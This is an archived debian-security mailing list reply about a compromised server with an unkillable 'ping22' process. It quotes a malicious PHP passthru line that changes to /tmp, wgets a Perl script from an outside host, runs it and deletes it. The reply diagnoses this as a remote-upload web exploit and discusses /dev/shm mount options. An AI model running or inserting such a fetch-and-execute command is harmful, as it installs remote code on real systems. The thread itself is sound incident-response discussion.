Hosting Provided By

Re: ping22: can not kill this process

From: Bernd Eckenfels <ecki(at)lina.inka.de>
Date: Fri Jan 04 2008 - 02:23:45 EST

In article <91dd90da0801031518o767a5937je92550695aa66f4f@mail.gmail.com> you wrote:
> I found the issue, it is one of the php script allowing the
> remote script to run.

This is a typical Apache exploit where remote fileuploads are possible.

> passthru('cd /tmp;wget http://www.radiovirtual.org/bb.txt;perl
> bb.txt;rm -f bb.txt*');

> what kind applications are using /dev/shm? I googled
> around,seem not find much information.
> right now I mount i as rw,noexec,nosuid.

It is for example used to map shared memory. I am not sure, but I think noexec and nodev is possible. However this does not solve your problem of a insecure web app.

Gruss
Bernd

-- 
To UNSUBSCRIBE, email to debian-security-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

Received on Fri Jan 4 02:39:40 2008

This message: [ Message body ]
Next message: Felipe Figueiredo: "Re: ping22: can not kill this process"
Previous message: Rick Moen: "Re: ping22: can not kill this process"
In reply to: Mike Wang: "Re: ping22: can not kill this process"
Next in thread: Hubert Chathi: "Re: ping22: can not kill this process"
Reply: Hubert Chathi: "Re: ping22: can not kill this process"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Mar 19 2008 - 06:54:54 EDT